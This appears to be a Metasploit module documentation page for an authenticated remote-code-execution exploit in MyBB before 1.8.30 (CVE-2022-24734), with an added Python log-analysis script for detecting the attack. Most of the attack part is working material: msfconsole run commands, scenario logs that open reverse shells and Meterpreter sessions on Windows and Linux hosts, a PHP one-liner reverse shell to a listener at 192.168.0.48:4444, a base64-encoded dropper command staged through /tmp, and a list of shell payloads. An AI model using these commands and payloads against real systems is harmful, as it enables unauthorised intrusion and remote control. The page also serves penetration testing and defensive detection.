MyBB Admin Control Code Injection RCE - Metasploit
This page contains detailed information about how to use the exploit/multi/http/mybb_rce_cve_2022_24734 Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MyBB Admin Control Code Injection RCE
Module: exploit/multi/http/mybb_rce_cve_2022_24734
Source code: modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb
Disclosure date: 2022-03-09
Last modification time: 2022-05-30 16:24:18 +0000
Supported architecture(s): php, cmd, x86, x64
Supported platform(s): Linux, PHP, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-24734
This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. The MyBB Admin Control Panel settings page calls the PHP eval function with unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting. Note that authentication is required for this exploit to work, and the account must have rights to add or update settings (typically, the MyBB administrator role).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
- artifacts-on-disk: The module leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/multi/http/mybb_rce_cve_2022_24734
msf exploit(mybb_rce_cve_2022_24734) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
USERNAME: MyBB Admin CP username
PASSWORD: MyBB Admin CP password
Knowledge Base
Vulnerable Application
This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. The MyBB Admin Control Panel settings page calls the PHP eval function with unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting.
Note that authentication is required for this exploit to work, and the account must have rights to add or update settings (typically, the MyBB administrator role).
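As a detection aid for defenders, the following Python is an added example (not part of the module or its documentation) that flags the add-setting, trigger, delete-setting burst described above in nginx or Apache combined access logs. The Admin CP URIs (`/admin/index.php?module=config-settings` with `action=add` and `action=delete`), the 120-second window and the sample log lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined/common access-log format as written by nginx and Apache.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumed Admin CP endpoints for adding and deleting a setting. These paths
# are an assumption for this example, not taken from the module documentation;
# adjust them to what your own Admin CP traffic looks like.
SETTINGS_URI = '/admin/index.php?module=config-settings'
ADD_ACTION = 'action=add'
DELETE_ACTION = 'action=delete'

# An administrator rarely creates a setting and deletes it again within a
# couple of minutes; the module does add -> trigger -> delete within seconds.
WINDOW_SECONDS = 120


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def is_settings_request(uri, action):
    return uri.startswith(SETTINGS_URI) and action in uri


def find_setting_bursts(lines, window=WINDOW_SECONDS):
    """Return one finding per client that POSTs a new setting and then deletes a
    setting within `window` seconds. The requests in between are included so an
    analyst can see which page was fetched to trigger the injected setting."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec['ip']].append(rec)

    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        for i, add in enumerate(recs):
            if add['method'] != 'POST' or not is_settings_request(add['uri'], ADD_ACTION):
                continue
            for j in range(i + 1, len(recs)):
                delta = (recs[j]['ts'] - add['ts']).total_seconds()
                if delta > window:
                    break
                if is_settings_request(recs[j]['uri'], DELETE_ACTION):
                    findings.append({
                        'ip': ip,
                        'added_at': add['ts'].isoformat(),
                        'deleted_after_seconds': delta,
                        'between': [r['uri'] for r in recs[i + 1:j]],
                    })
                    break
    return findings


# Constructed sample log: the first client mirrors the module's sequence
# (login, add setting, fetch a settings page, delete setting); the others are
# benign admin activity and the intcheck fingerprint used by the module's check.
SAMPLE_LOG = [
    '192.168.1.44 - - [23/May/2022:15:41:30 +0200] "POST /admin/index.php HTTP/1.1" 302 0',
    '192.168.1.44 - - [23/May/2022:15:41:33 +0200] "POST /admin/index.php?module=config-settings&action=add HTTP/1.1" 302 0',
    '192.168.1.44 - - [23/May/2022:15:41:36 +0200] "GET /admin/index.php?module=config-settings&action=change&gid=1 HTTP/1.1" 200 5123',
    '192.168.1.44 - - [23/May/2022:15:41:41 +0200] "GET /admin/index.php?module=config-settings&action=delete&sid=42 HTTP/1.1" 302 0',
    '10.0.0.7 - - [23/May/2022:09:02:11 +0200] "POST /admin/index.php?module=config-settings&action=add HTTP/1.1" 302 0',
    '10.0.0.7 - - [23/May/2022:11:40:11 +0200] "GET /admin/index.php?module=config-settings&action=delete&sid=7 HTTP/1.1" 302 0',
    '10.0.0.9 - - [23/May/2022:10:00:00 +0200] "GET /index.php?intcheck=1 HTTP/1.1" 200 12',
]

if __name__ == '__main__':
    for f in find_setting_bursts(SAMPLE_LOG):
        print(f"{f['ip']}: setting added at {f['added_at']} and deleted "
              f"{f['deleted_after_seconds']:.0f}s later; requests in between: {f['between']}")
```

Pair the finding with the module's other side effects (the config-changes entry in the settings table and, for the dropper targets, the temporary files under /tmp shown in the scenarios) to confirm a hit.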
Installation Steps
Linux with Docker
- Use this `docker-compose.yml` file (see this):

```yaml
services:
  mybb:
    image: mybb/mybb:1.8.29
    volumes:
      - ${PWD}/mybb:/var/www/html:rw
  nginx:
    image: nginx:mainline-alpine
    ports:
      - published: 8080
        target: 80
    volumes:
      - ${PWD}/nginx:/etc/nginx/conf.d:ro
      - ${PWD}/mybb:/var/www/html:ro
  postgresql:
    environment:
      POSTGRES_DB: mybb
      POSTGRES_PASSWORD: changeme
      POSTGRES_USER: mybb
    image: postgres:14-alpine
    volumes:
      - ${PWD}/postgres/data:/var/lib/postgresql/data:rw
version: '3.8'
```
- Create `nginx/default.conf`:

```nginx
upstream mybb {
    server mybb:9000 weight=5;
}

server {
    listen 80;
    root /var/www/html;
    index index.html index.php;

    location / {
        try_files $uri $uri/ /index.php?$args;
    }
    location ~ inc/ {
        internal;
    }
    location ~ ^/(images|cache|jscripts|uploads)/ {
        access_log off;
    }
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass mybb;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
    }
}
```

- Run `docker-compose up`.
- Access the application at `http://127.0.0.1:8080/install` and finish the installation process.
Windows with Nginx, PHP and MySQL
- Install MySQL:
  - Follow the installation process here
- Install PHP:
  - Download PHP (Non Thread Safe) here
  - Extract everything to `C:\php`
  - Run:

```bat
cd C:\php
set PHP_FCGI_CHILDREN=5
set PHP_FCGI_MAX_REQUESTS=500
php-cgi.exe -b 127.0.0.1:9999
```
- Install Nginx:
  - Download Nginx here
  - Extract everything to `C:\nginx`
  - Set the following options in `C:\nginx\nginx.conf`:

```nginx
worker_processes auto;
...
server {
    listen 80;
    root www;
    index index.html index.php;

    location / {
        try_files $uri $uri/ /index.php?$args;
    }
    location ~ inc/ {
        internal;
    }
    location ~ ^/(images|cache|jscripts|uploads)/ {
        access_log off;
    }
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass 127.0.0.1:9999;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
    }
}
```

  - Run:

```bat
cd C:\nginx
start nginx.exe
```
Install MyBB
- Follow the installation process here.
Verification Steps
- Install the application (see Installation Steps)
- Start msfconsole
- Do:
use exploit/multi/http/mybb_rce_cve_2022_24734
- Do:
run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
- You should get a shell.
- Try again with different targets
Options
USERNAME
The username of a privileged MyBB account. It must have rights to add or update settings (usually the administrator role).
PASSWORD
The password of the MyBB account.
Scenarios
Windows (target 0 - PHP)
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.1.215
[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
meterpreter > sysinfo
Computer : DC02
OS : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
Meterpreter : php/windows
Linux (target 0 - PHP)
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
meterpreter > sysinfo
Computer : e087259940a8
OS : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux
Linux (target 1 - Unix (In-Memory))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
target => 1
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200
ls
backups
inc
index.php
jscripts
modules
styles
^C
Abort session 3? [y/N] y
Linux (target 2 - linux (Dropper))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.0.48
[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > sysinfo
Computer : 172.18.0.4
OS : (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
Windows (target 3 - Windows (In-Memory))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
target => 4
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Powershell command length: 4160
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Meterpreter session 6 opened (192.168.1.44:4444 -> 192.168.1.215:59025) at 2022-05-30 15:58:01 +0200
meterpreter > sysinfo
Computer : DC02
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MYLAB
Logged On Users : 8
Meterpreter : x86/windows
Windows (target 4 - Windows (Dropper))
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
target => 5
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
...
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200
meterpreter > sysinfo
Computer : DC02
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MYLAB
Logged On Users : 8
Meterpreter : x86/windows
Msfconsole Usage
Here is how the multi/http/mybb_rce_cve_2022_24734 exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/mybb_rce_cve_2022_24734
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show info
Name: MyBB Admin Control Code Injection RCE
Module: exploit/multi/http/mybb_rce_cve_2022_24734
Platform: PHP, Unix, Linux, Windows
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-03-09
Provided by:
Cillian Collins
Altelus
Christophe De La Fuente
Module side effects:
config-changes
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:

| Id | Name |
|---|---|
| 0 | PHP |
| 1 | Unix (In-Memory) |
| 2 | Linux (Dropper) |
| 3 | Windows (In-Memory) |
| 4 | Windows (Dropper) |
Check supported:
Yes
Basic options:

| Name | Current Setting | Required | Description |
|---|---|---|---|
| PASSWORD | | yes | MyBB Admin CP password |
| Proxies | | no | A proxy chain of format type:host:port[,type:host:port][...] |
| RHOSTS | | yes | The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit |
| RPORT | 80 | yes | The target port (TCP) |
| SRVHOST | 0.0.0.0 | yes | The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. |
| SRVPORT | 8080 | yes | The local port to listen on. |
| SSL | false | no | Negotiate SSL/TLS for outgoing connections |
| SSLCert | | no | Path to a custom SSL certificate (default is randomly generated) |
| TARGETURI | / | yes | The URI of the MyBB application |
| URIPATH | | no | The URI to use for this exploit (default is random) |
| USERNAME | | yes | MyBB Admin CP username |
| VHOST | | no | HTTP server virtual host |
Payload information:
Description:
This exploit module leverages an improper input validation
vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in
the context of the user running the application. MyBB Admin Control
setting page calls PHP `eval` function with an unsanitized user
input. The exploit adds a new setting, injecting the payload in the
vulnerable field, and triggers its execution with a second request.
Finally, it takes care of cleaning up and removes the setting. Note
that authentication is required for this exploit to work and the
account must have rights to add or update settings (typically, myBB
administrator role).
References:
https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f
https://www.zerodayinitiative.com/advisories/ZDI-22-503/
https://github.com/Altelus1/CVE-2022-24734
https://nvd.nist.gov/vuln/detail/CVE-2022-24734
Module Options
This is a complete list of options available in the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show options
Module options (exploit/multi/http/mybb_rce_cve_2022_24734):
| Name | Current Setting | Required | Description |
|---|---|---|---|
| PASSWORD | | yes | MyBB Admin CP password |
| Proxies | | no | A proxy chain of format type:host:port[,type:host:port][...] |
| RHOSTS | | yes | The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit |
| RPORT | 80 | yes | The target port (TCP) |
| SRVHOST | 0.0.0.0 | yes | The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. |
| SRVPORT | 8080 | yes | The local port to listen on. |
| SSL | false | no | Negotiate SSL/TLS for outgoing connections |
| SSLCert | | no | Path to a custom SSL certificate (default is randomly generated) |
| TARGETURI | / | yes | The URI of the MyBB application |
| URIPATH | | no | The URI to use for this exploit (default is random) |
| USERNAME | | yes | MyBB Admin CP username |
| VHOST | | no | HTTP server virtual host |
Payload options (php/meterpreter/reverse_tcp):
| Name | Current Setting | Required | Description |
|---|---|---|---|
| LHOST | | yes | The listen address (an interface may be specified) |
| LPORT | 4444 | yes | The listen port |
Exploit target:
| Id | Name |
|---|---|
| 0 | PHP |
Advanced Options
Here is a complete list of advanced options supported by the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show advanced
Module advanced options (exploit/multi/http/mybb_rce_cve_2022_24734):
| Name | Current Setting | Required | Description |
|---|---|---|---|
| AutoCheck | true | no | Run check before exploit |
| CMDSTAGER::DECODER | | no | The decoder stub to use. |
| CMDSTAGER::FLAVOR | auto | no | The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_invokewebrequest) |
| CMDSTAGER::SSL | false | no | Use SSL/TLS for supported stagers |
| CMDSTAGER::TEMP | | no | Writable directory for staged files |
| ContextInformationFile | | no | The information file that contains context information |
| DOMAIN | WORKSTATION | yes | The domain to use for Windows authentication |
| DigestAuthIIS | true | no | Conform to IIS, should work for most servers. Only set to false for non-IIS servers |
| DisablePayloadHandler | false | no | Disable the handler code for the selected payload |
| EXE::Custom | | no | Use custom exe instead of automatically generating a payload exe |
| EXE::EICAR | false | no | Generate an EICAR file instead of regular payload exe |
| EXE::FallBack | false | no | Use the default template in case the specified one is missing |
| EXE::Inject | false | no | Set to preserve the original EXE function |
| EXE::OldMethod | false | no | Set to use the substitution EXE generation method. |
| EXE::Path | | no | The directory in which to look for the executable template |
| EXE::Template | | no | The executable template file name. |
| EnableContextEncoding | false | no | Use transient context when encoding payloads |
| FingerprintCheck | true | no | Conduct a pre-exploit fingerprint verification |
| ForceExploit | false | no | Override check result |
| HttpClientTimeout | | no | HTTP connection and receive timeout |
| HttpPassword | | no | The HTTP password to specify for authentication |
| HttpRawHeaders | | no | Path to ERB-templatized raw headers to append to existing headers |
| HttpTrace | false | no | Show the raw HTTP requests and responses |
| HttpTraceColors | red/blu | no | HTTP request and response colors for HttpTrace (unset to disable) |
| HttpTraceHeadersOnly | false | no | Show HTTP headers only in HttpTrace |
| HttpUsername | | no | The HTTP username to specify for authentication |
| ListenerBindAddress | | no | The specific IP address to bind to if different from SRVHOST |
| ListenerBindPort | | no | The port to bind to if different from SRVPORT |
| ListenerComm | | no | The specific communication channel to use for this service |
| MSI::Custom | | no | Use custom msi instead of automatically generating a payload msi |
| MSI::EICAR | false | no | Generate an EICAR file instead of regular payload msi |
| MSI::Path | | no | The directory in which to look for the msi template |
| MSI::Template | | no | The msi template file name |
| MSI::UAC | false | no | Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) |
| Powershell::encode_final_payload | false | yes | Encode final payload for -EncodedCommand |
| Powershell::encode_inner_payload | false | yes | Encode inner payload for -EncodedCommand |
| Powershell::exec_in_place | false | yes | Produce PSH without executable wrapper |
| Powershell::exec_rc4 | false | yes | Encrypt PSH with RC4 |
| Powershell::method | reflection | yes | Payload delivery method (Accepted: net, reflection, old, msil) |
| Powershell::no_equals | false | yes | Pad base64 until no "=" remains |
| Powershell::noninteractive | true | yes | Execute powershell without interaction |
| Powershell::persist | false | yes | Run the payload in a loop |
| Powershell::prepend_protections_bypass | auto | yes | Prepend AMSI/SBL bypass (Accepted: auto, true, false) |
| Powershell::prepend_sleep | | no | Prepend seconds of sleep |
| Powershell::remove_comspec | false | yes | Produce script calling powershell directly |
| Powershell::strip_comments | true | yes | Strip comments |
| Powershell::strip_whitespace | false | yes | Strip whitespace |
| Powershell::sub_funcs | false | yes | Substitute function names |
| Powershell::sub_vars | true | yes | Substitute variable names |
| Powershell::wrap_double_quotes | true | yes | Wraps the -Command argument in single quotes |
| SSLCipher | | no | String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" |
| SSLCompression | false | no | Enable SSL/TLS-level compression |
| SSLServerNameIndication | | no | SSL/TLS Server Name Indication (SNI) |
| SSLVersion | Auto | yes | Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) |
| SendRobots | false | no | Return a robots.txt file if asked for one |
| URIHOST | | no | Host to use in URI (useful for tunnels) |
| URIPORT | | no | Port to use in URI (useful for tunnels) |
| UserAgent | Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1 | no | The User-Agent header to use for all requests |
| VERBOSE | false | no | Enable detailed status messages |
| WORKSPACE | | no | Specify the workspace for this module |
| WfsDelay | 2 | no | Additional delay in seconds to wait for a session |
Payload advanced options (php/meterpreter/reverse_tcp):
| Name | Current Setting | Required | Description |
|---|---|---|---|
| AutoLoadStdapi | true | yes | Automatically load the Stdapi extension |
| AutoRunScript | | no | A script to run automatically on session creation. |
| AutoSystemInfo | true | yes | Automatically capture system information on initialization. |
| AutoUnhookProcess | false | yes | Automatically load the unhook extension and unhook the process |
| AutoVerifySessionTimeout | 30 | no | Timeout period to wait for session validation to occur, in seconds |
| EnableStageEncoding | false | no | Encode the second stage payload |
| EnableUnicodeEncoding | false | yes | Automatically encode UTF-8 strings as hexadecimal |
| HandlerSSLCert | | no | Path to a SSL certificate in unified PEM format, ignored for HTTP transports |
| InitialAutoRunScript | | no | An initial script to run on session creation (before AutoRunScript) |
| MeterpreterDebugBuild | false | no | Use a debug version of Meterpreter |
| MeterpreterDebugLogging | | no | The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions |
| PayloadProcessCommandLine | | no | The displayed command line that will be used by the payload |
| PayloadUUIDName | | no | A human-friendly name to reference this unique payload (requires tracking) |
| PayloadUUIDRaw | | no | A hex string representing the raw 8-byte PUID value for the UUID |
| PayloadUUIDSeed | | no | A string to use when generating the payload UUID (deterministic) |
| PayloadUUIDTracking | false | yes | Whether or not to automatically register generated UUIDs |
| PingbackRetries | 0 | yes | How many additional successful pingbacks |
| PingbackSleep | 30 | yes | Time (in seconds) to sleep between pingbacks |
| ReverseAllowProxy | false | yes | Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST |
| ReverseListenerBindAddress | | no | The specific IP address to bind to on the local system |
| ReverseListenerBindPort | | no | The port to bind to on the local system if different from LPORT |
| ReverseListenerComm | | no | The specific communication channel to use for this listener |
| ReverseListenerThreaded | false | yes | Handle every connection in a new thread (experimental) |
| SessionCommunicationTimeout | 300 | no | The number of seconds of no activity before this session should be killed |
| SessionExpirationTimeout | 604800 | no | The number of seconds before this session should be forcibly shut down |
| SessionRetryTotal | 3600 | no | Number of seconds try reconnecting for on network failure |
| SessionRetryWait | 10 | no | Number of seconds to wait between reconnect attempts |
| StageEncoder | | no | Encoder to use if EnableStageEncoding is set |
| StageEncoderSaveRegisters | | no | Additional registers to preserve in the staged payload if EnableStageEncoding is set |
| StageEncodingFallback | true | no | Fallback to no encoding if the selected StageEncoder is not compatible |
| StagerRetryCount | 10 | no | The number of times the stager should retry if the first connect fails |
| StagerRetryWait | 5 | no | Number of seconds to wait for the stager between reconnect attempts |
| VERBOSE | false | no | Enable detailed status messages |
| WORKSPACE | | no | Specify the workspace for this module |
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/mybb_rce_cve_2022_24734 module can exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show targets
Exploit targets:
| Id | Name |
|---|---|
| 0 | PHP |
| 1 | Unix (In-Memory) |
| 2 | Linux (Dropper) |
| 3 | Windows (In-Memory) |
| 4 | Windows (Dropper) |
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/mybb_rce_cve_2022_24734 exploit:
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show payloads
Compatible Payloads
===================
| # | Name | Disclosure Date | Rank | Check | Description |
|---|---|---|---|---|---|
| 0 | payload/generic/custom | | normal | No | Custom Payload |
| 1 | payload/generic/shell_bind_tcp | | normal | No | Generic Command Shell, Bind TCP Inline |
| 2 | payload/generic/shell_reverse_tcp | | normal | No | Generic Command Shell, Reverse TCP Inline |
| 3 | payload/generic/ssh/interact | | normal | No | Interact with Established SSH Connection |
| 4 | payload/multi/meterpreter/reverse_http | | normal | No | Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures) |
| 5 | payload/multi/meterpreter/reverse_https | | normal | No | Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures) |
| 6 | payload/php/bind_perl | | normal | No | PHP Command Shell, Bind TCP (via Perl) |
| 7 | payload/php/bind_perl_ipv6 | | normal | No | PHP Command Shell, Bind TCP (via perl) IPv6 |
| 8 | payload/php/bind_php | | normal | No | PHP Command Shell, Bind TCP (via PHP) |
| 9 | payload/php/bind_php_ipv6 | | normal | No | PHP Command Shell, Bind TCP (via php) IPv6 |
| 10 | payload/php/download_exec | | normal | No | PHP Executable Download and Execute |
| 11 | payload/php/exec | | normal | No | PHP Execute Command |
| 12 | payload/php/meterpreter/bind_tcp | | normal | No | PHP Meterpreter, Bind TCP Stager |
| 13 | payload/php/meterpreter/bind_tcp_ipv6 | | normal | No | PHP Meterpreter, Bind TCP Stager IPv6 |
| 14 | payload/php/meterpreter/bind_tcp_ipv6_uuid | | normal | No | PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support |
| 15 | payload/php/meterpreter/bind_tcp_uuid | | normal | No | PHP Meterpreter, Bind TCP Stager with UUID Support |
| 16 | payload/php/meterpreter/reverse_tcp | | normal | No | PHP Meterpreter, PHP Reverse TCP Stager |
